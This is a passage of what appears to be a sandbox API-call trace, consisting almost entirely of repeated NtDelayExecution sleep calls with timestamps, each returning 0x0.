(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0164.481] NtDelayExecution 